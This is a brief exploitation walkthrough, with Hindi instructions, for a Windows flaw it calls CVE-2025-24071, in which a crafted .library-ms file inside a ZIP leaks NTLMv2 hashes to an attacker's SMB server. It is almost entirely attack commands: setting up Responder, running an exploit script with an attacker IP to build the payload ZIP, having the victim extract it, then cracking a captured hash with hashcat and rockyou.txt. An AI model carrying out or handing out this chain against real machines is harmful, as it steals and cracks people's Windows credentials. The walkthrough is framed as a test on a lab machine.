
CVE-2025-24071: NTLMv2 Hash Disclosure via .library-ms File
sudo apt update && sudo apt install responder -y
Responder शुरू करें
sudo responder -I eth0
आवश्यक Python मॉड्यूल इंस्टॉल करें
pip install colorama python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep
यह उत्पन्न करेगा: testpayload.library-ms testpayload.zip
testpayload.zip को Windows 11 परीक्षण मशीन पर स्थानांतरित करें। Windows File Explorer का उपयोग करके ZIP निकालें। यह Windows को SMB पथ तक पहुँचने का प्रयास करने के लिए ट्रिगर करेगा, जिससे NTLM हैश लीक हो जाएगा।
responder -I eth0

hash.txt फ़ाइल बनाएं
victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3
सबसे सामान्य rockyou.txt
hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
